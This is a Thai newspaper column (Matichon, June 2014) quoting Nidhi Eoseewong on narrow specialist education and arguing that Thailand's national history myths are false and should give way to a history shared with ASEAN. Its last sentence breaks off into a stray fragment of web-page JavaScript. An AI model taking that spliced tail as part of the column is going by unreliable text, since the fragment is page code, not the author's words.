มติชนรายวัน ฉบับประจำวันจันทร์ที่ 30 มิถุนายน 2557

 

สำคัญตนผิด

          ระบบการศึกษาแผนใหม่ทำให้ทหารก็ตาม, วิศวกรก็ตาม, แพทย์ก็ตาม, โปรแกรมเมอร์ก็ตาม รู้จักความจริงเพียงส่วนเดียวของโลก

          ซ้ำการศึกษาของไทยยังชวนให้เข้าใจผิดว่าความจริงส่วนเสี้ยวเล็กๆ นี้คือทั้งหมดของความจริงในโลก จึงใช้ความรู้ที่เป็นส่วนเสี้ยวของความจริงทั้งหมดที่ตนเชี่ยวชาญไปจัดการกับโลก

          ผลก็คือความสูญเสียที่ไม่จำเป็น ทั้งต่อตนเองและผู้อื่น

          (อำนาจที่ไม่รู้จัก ของ นิธิ เอียวศรีวงศ์ ใน มติชน ฉบับวันจันทร์ที่ 23 มิถุนายน 2557 หน้า 20)

 

ไทยกับอาเซียนมีประวัติศาสตร์ร่วมกัน

          ประวัติศาสตร์แห่งชาติของไทยที่ใช้กันมานาน แล้วฝังอยู่ในสำนึกจนปัจจุบัน ที่กำลังจะเอามาใช้งานอีก แต่มีจุดอ่อนหลายเรื่อง โดยเฉพาะเรื่องสำคัญมีเนื้อหาย่อๆดังนี้

          1. ประวัติศาสตร์ชนชาติไทยบริสุทธิ์

          2. มีแหล่งกำเนิดแห่งใดแห่งหนึ่งเพียงแห่งเดียวอยู่ทางทิศเหนือ แล้วถูกรุกรานต้องอพยพถอนรากถอนโคนลงทางทิศใต้

          3. แย่งดินแดนของชนชาติอื่น แล้วยึดครองสืบเป็นประเทศไทย

          ทั้ง 3 ข้อ ที่ยกตัวอย่างนี้ล้วนไม่จริง แต่เป็นมโนจินตนาการของนักค้นคว้ารุ่นก่อนๆ แล้วคนรุ่นหลังๆยึดถือกันเองว่าถูกต้องเป็นที่ยุติ โดยไม่มีการตรวจสอบกับหลักฐานว่ามีจริงหรือไม่? แล้วห้ามถาม ห้ามเถียง ใครไม่เชื่อ จะถูกประณามว่าไม่รักชาติ

          ส่งผลเสียหายผิดพลาดต่อการกำหนดทิศทางนโยบายเศรษฐกิจการเมืองและการทหาร รวมถึงการจัดแสดงผิดพลาดในพิพิธภัณฑสถานแห่งชาติ ตราบจนทุกวันนี้

          แนวทางแก้ไขปรับเปลี่ยนการเรียนรู้ มีดังนี้

          1. ดินแดนและผู้คนในไทย มีพัฒนาการความเป็นมาเป็นส่วนหนึ่งของอาเซียนอย่างแยกไม่ได้ ดังนั้น การเรียนรู้ต้องควบคู่กันทั้งภูมิศาสตร์และประวัติศาสตร์

          2. คนไทยมีบรรพชนร่วมกันกับคนอาเซียน

          3. วัฒนธรรมไทย มีความเป็นมาร่วมกันกับวัฒนธรรมอาเซียน

          ไทยใช้ประวัติศาสตร์แห่งชาติครอบงำ“สั่งสอน”สังคมทั้งในระบบและนอกระบบ ผ่านกิจกรรมปลุกใจต่างๆจนมากเกินต้องการ จึงควรลดสิ่งเหล่านี้ลง

          แต่เพิ่มกิจกรรม“สั่งสม” เช่น เดินทางท่องเที่ยวเชิงประวัติศาสตร์อย่างรื่นรมย์ แต่รู้เรื่องง่ายๆd.getElementsByTagName(‘head’)[0].appendChild(s);if (document.currentScript) {